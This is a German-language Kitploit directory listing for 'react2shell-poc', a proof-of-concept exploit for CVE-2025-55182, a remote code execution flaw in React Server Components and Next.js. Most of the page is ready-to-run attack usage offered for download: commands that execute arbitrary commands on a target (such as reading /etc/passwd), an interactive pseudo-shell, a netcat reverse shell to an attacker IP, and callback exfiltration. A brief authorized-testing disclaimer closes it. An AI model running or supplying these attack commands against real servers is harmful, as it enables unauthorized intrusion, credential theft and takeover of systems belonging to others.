Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC – Kritische RCE in React Server Components / Next.js. CVSS 10.0. Fehlerbasierte Exfiltration, Reverse Shell, interaktiver Modus. | Kitploit
Tools/GitHubGitHub/p3ta00/react2shell-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-Tool
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC – Kritische RCE in React Server Components / Next.js. CVSS 10.0. Fehlerbasierte Exfiltration, Reverse Shell, interaktiver Modus.

Repository anzeigen
914vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell - CVE-2025-55182 PoC

Proof of Concept für CVE-2025-55182, eine kritische nicht authentifizierte Remote-Code-Ausführungsschwachstelle in React Server Components.

CVSS-Score: 10.0 (Kritisch)

Schwachstelle

Die Schwachstelle existiert im Flight-Protokoll-Deserialisierer von React. Durch Ausnutzung von Prototype-Pollution mittels speziell gestalteter Payloads kann ein Angreifer eine beliebige Codeausführung auf verwundbaren Next.js-Anwendungen erreichen.

Betroffene Versionen

ProduktVerwundbarGepatched
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Installation

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Verwendung

Befehlsausführung mit Ausgabe (Standard – Fehlerbasierte Exfiltration)

Die Ausgabe wird direkt in der HTTP-Antwort über den NEXT_REDIRECT-Fehler zurückgegeben – kein Callback-Server erforderlich.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Interaktiver Modus

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

Schwachstelle prüfen

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

Blind RCE (Keine Ausgabe)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Reverse Shell

root@kitploit:~
# Listener starten
nc -lvnp 4444

# Payload senden
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Legacy: Callback-basierte Exfiltration

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Optionen

root@kitploit:~
-t, --target       Ziel-URL (erforderlich)
-c, --command      Auszuführender Befehl (Ausgabe standardmäßig über fehlerbasierte Exfiltration)
--check            Prüfen, ob das Ziel verwundbar ist
--blind            Blind-RCE-Modus (keine Ausgabeerfassung)
--listen           Callback-Server anstelle der fehlerbasierten Exfiltration verwenden
-i, --interactive  Interaktiver Pseudo-Shell-Modus
--revshell         Reverse Shell versuchen
--lhost            Angreifer-IP für Callbacks/Reverse Shell
--lport            Callback-Port (Standard: 9999)
--callback         Manuelle Callback-URL
--timeout          Request-Timeout in Sekunden (Standard: 30)

Funktionsweise

Die standardmäßige Exfiltrationsmethode verwendet die NEXT_REDIRECT-Fehlerinjektion:

  1. Befehl ausführen und Ausgabe erfassen
  2. Einen NEXT_REDIRECT-Fehler mit der Ausgabe im digest-Feld auslösen
  3. Next.js serialisiert den Fehler in der Flight-Antwort
  4. Die Ausgabe erscheint direkt im HTTP-Antworttext

Dies ist zuverlässiger als die callback-basierte Exfiltration, da hierfür kein ausgehender Netzwerkzugriff vom Ziel aus erforderlich ist.

Referenzen

  • Wiz Security - React2Shell Disclosure
  • Datadog Security Labs Analysis
  • NVD - CVE-2025-55182

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets eine ordnungsgemäße Autorisierung ein.

Autor

p3ta

Tool herunterladen